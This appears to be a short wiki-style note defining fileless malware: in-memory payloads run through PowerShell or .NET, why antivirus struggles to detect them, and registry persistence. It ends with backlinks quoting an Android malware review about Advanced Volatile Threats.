Fileless Malware

Fileless Malware is a form of malware that doesn’t write anything to disk or hard drive. The payloads are read, in a form of HTTP request ¹ , and executed by other applications, usually a shell, or framework such as command prompt, PowerShell or .NET framework. Since the malware is directly put into memory, it is rather hard for antivirus to detect it with conventional means of anti-analysis techniques. In addition, it is tremendously hard to differentiate a legitimate process and a malicious process by just looking at the process tree. Some even stored themselves inside registry, which could put into main memory every time after system boot up.

It is particular popular in Powerware campaign and high profile DNC hack.

Footnotes

https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene

Links to this page

A Review on Android Malware: Attacks, Countermeassures and Challenges

It could be in various form such as executable file format, non-executable file format or fileless#.

There is an emerging form of malware in Windows that is fileless# known as Advanced Volatile Threats (AVTs). Such malware will operate in the volatile main memory which could avoid detection from anti-analysis techniques. Possible attack vectors including PowerShell, Windows Management Instrumentation (WMI)#, command prompt, .NET framework, and Remote Desktop Protocol (RDP). AVTs utilise scripts such as JavaScript and Visual Basic, and compile HTML files under the hood of a system process.